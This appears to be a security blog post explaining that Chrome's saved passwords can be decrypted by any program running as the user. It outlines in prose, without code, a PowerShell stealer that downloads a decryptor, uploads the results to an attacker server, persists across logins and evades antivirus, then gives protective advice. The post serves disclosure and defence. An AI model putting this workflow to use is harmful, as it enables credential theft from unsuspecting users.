Popular browser’s like Google Chrome offer a convenient way to “securely” store your passwords. But they are not as secure as you might hope, and can leave you open to simple exploits that steal data right out of your browser’s storage system.

The problem is that many browsers, Chrome is the example we use here, encrypt that passwords with the operating system’s built-in encryption technology. This is ideal for some forms of data to which programs need access. However, for your personal passwords stored in your browser, it’s bad news. You see, any program that can run “as you” in the operating system can get access to this data. To demonstrate this, we actually wrote our own piece of malware to make this happen.

The Quiet PowerShell Password Thief

Windows PowerShell is a shell initially developed by Microsoft for the purposes of task automation and configuration management. it’s a very powerful tool that system administrators use to automate important tasks to keep your machine running. However, it can also be used for nefarious purposes. Many of the commands available in PowerShell that are very useful can also be used to do malicious things like download malware.

In this case, we used an open source tool that decrypts your Chrome passwords in just 37 lines of code. We then wrote a little code of our own that could silently run in the background and:

  • Download the Chrome Password Decryptor;
  • Run it;
  • Save the results to a file;
  • Upload the results to our test “attacker” server;
  • Adds a persistence mechanism to ensure that this process repeats itself every time you log in to your computer, so we always have your latest passwords.

Using other advanced techniques to deliver malware, an attacker could deliver this malware to you quietly and begin collecting your sensitive account information. We tested our payload across multiple different antivirus systems and none of them picked it up. In fact, it didn’t get caught until our colleagues at Huntress Labs alerted us to its presence.

What does this mean?

Put simply, we successfully created a payload the steals your Google Chrome saved passwords every time you log in to your computer, and we did so without being detected by some of the most advanced antivirus platforms in the world.

How do I protect myself?

Step 1. Get a New Password Manager

We like Bitwarden, as it’s free and easy to use. The premium version unlocks a little more, but the free edition typically works for the average user.

Step 2. Remove Your Passwords from Google Chrome

Follow this guide from Google on removing stored passwords in Chrome.

Step 3. Enable two-factor authentication everywhere you can!

We get it, it’s kind of a pain to enter both a password and your “onetime secret.” However, two-factor authentication is critical to protecting you from password theft. There are physical options for two-factor now that support some accounts, such as the Yubico YubiKey that works with Google, Facebook, and some other providers who are catching up.

Bonus Protections

There are other good security practices you should be following:

  • Unique Passwords
    Using the same password for your Facebook and Bank account is just a bad idea. If your Facebook account is compromised, so too is your bank account. That’s not good! Your new password manager should allow you to generate unique passwords for each login you create.
  • Strong Passwords
    Weak passwords are a pointless epidemic. Use strong passwords that are hard for people to crack. A password manager makes this much easier to accomplish. Be sure to use a strong master password and two-factor authentication for your password manager. I like to use passphrases like “Opacity.twentieth.saggy.v1ce!”.